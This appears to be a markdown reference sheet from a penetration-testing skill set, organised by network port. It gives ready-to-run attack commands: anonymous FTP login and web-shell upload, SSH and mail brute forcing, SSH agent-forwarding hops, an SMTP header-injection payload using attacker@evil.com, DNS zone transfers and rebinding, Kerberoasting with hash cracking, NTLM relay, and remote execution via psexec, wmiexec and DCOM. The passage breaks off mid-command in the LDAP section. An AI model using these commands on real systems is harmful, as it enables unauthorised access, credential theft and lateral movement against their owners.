Unauthorized Access Common Services

# PORT / SERVICE EXPLOITATION MATRIX

> Supplementary reference for [unauthorized-access-common-services](./SKILL.md). Organized by port for rapid triage during service enumeration.

---

## Port 21 — FTP

```bash
# Anonymous login
ftp TARGET
> anonymous / anonymous@

# Enumerate
nmap -sV -p 21 --script=ftp-anon,ftp-bounce,ftp-syst TARGET

# PUT to webroot (if writable + mapped to web directory)
ftp TARGET
> put shell.php

# FTP bounce scan (use FTP server to port scan internal hosts)
nmap -Pn -b anonymous@FTP_SERVER INTERNAL_TARGET
```

## Port 22 — SSH

```bash
# Brute force
hydra -l root -P wordlist.txt ssh://TARGET
crackmapexec ssh TARGET -u users.txt -p passwords.txt

# Key reuse (found private key elsewhere)
ssh -i found_key user@TARGET

# Agent forwarding abuse
# If SSH_AUTH_SOCK is set on compromised host:
ssh-add -l    # list forwarded keys
ssh -A user@NEXT_TARGET   # use forwarded key to hop

# Username enumeration (CVE-2018-15473)
python3 ssh_user_enum.py TARGET -u userlist.txt
```

## Port 25 — SMTP

```bash
# Open relay test
nmap -p 25 --script smtp-open-relay TARGET

# User enumeration via VRFY/EXPN
smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET -D domain.com

# Header injection
# In email form: inject headers via newline
attacker@evil.com%0ACc:victim@target.com
```

## Port 53 — DNS

```bash
# Zone transfer
dig axfr @TARGET domain.com
host -l domain.com TARGET

# Subdomain brute force
gobuster dns -d domain.com -w subdomains.txt -r TARGET:53
dnsenum --dnsserver TARGET domain.com

# DNS rebinding
# Bind attacker domain to alternate between ATTACKER_IP and INTERNAL_IP
# Bypass same-origin checks to access internal services
```

## Port 80/443 — HTTP/HTTPS

See web application testing skills:
- [injection-checking](../injection-checking/SKILL.md) for input-based attacks
- [auth-sec](../auth-sec/SKILL.md) for authentication testing
- [file-access-vuln](../file-access-vuln/SKILL.md) for file operations
- [recon-and-methodology](../recon-and-methodology/SKILL.md) for web reconnaissance

## Port 88 — Kerberos

```bash
# AS-REP Roasting (no pre-auth required accounts)
GetNPUsers.py domain.com/ -usersfile users.txt -dc-ip TARGET -format hashcat
hashcat -m 18200 asrep_hashes.txt wordlist.txt

# Kerberoasting
GetUserSPNs.py domain.com/user:pass -dc-ip TARGET -request
hashcat -m 13100 tgs_hashes.txt wordlist.txt
```

See [active-directory-kerberos-attacks](../active-directory-kerberos-attacks/SKILL.md) for full Kerberos attack playbook.

## Port 110/143 — POP3/IMAP

```bash
# Brute force
hydra -l user -P wordlist.txt pop3://TARGET
hydra -l user -P wordlist.txt imap://TARGET

# Manual POP3 login
nc TARGET 110
> USER admin
> PASS password
> LIST
> RETR 1
```

## Port 135 — MSRPC

```bash
# Endpoint enumeration
rpcdump.py TARGET
rpcmap.py 'ncacn_ip_tcp:TARGET'

# Remote execution via DCOM
dcomexec.py domain/user:pass@TARGET 'whoami'

# IOXIDResolver — network interface enumeration
IOXIDResolver.py -t TARGET
```

## Port 139/445 — SMB

```bash
# Null session enumeration
smbclient -L //TARGET -N
enum4linux -a TARGET
crackmapexec smb TARGET -u '' -p '' --shares

# Share enumeration with creds
smbmap -H TARGET -u user -p pass
crackmapexec smb TARGET -u user -p pass --shares

# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 TARGET

# NTLM relay (see network-protocol-attacks)
ntlmrelayx.py -tf targets.txt -smb2support

# PsExec / WMIExec / SMBExec
psexec.py domain/user:pass@TARGET
wmiexec.py domain/user:pass@TARGET
smbexec.py domain/user:pass@TARGET
```

## Port 389/636 — LDAP

```bash
# Anonymous bind
ldapsearch -x -H ldap://TARGET -b "DC=domain,DC=com"

# Base DN enumeration
ldapsearch -x -H ldap://TARGET -s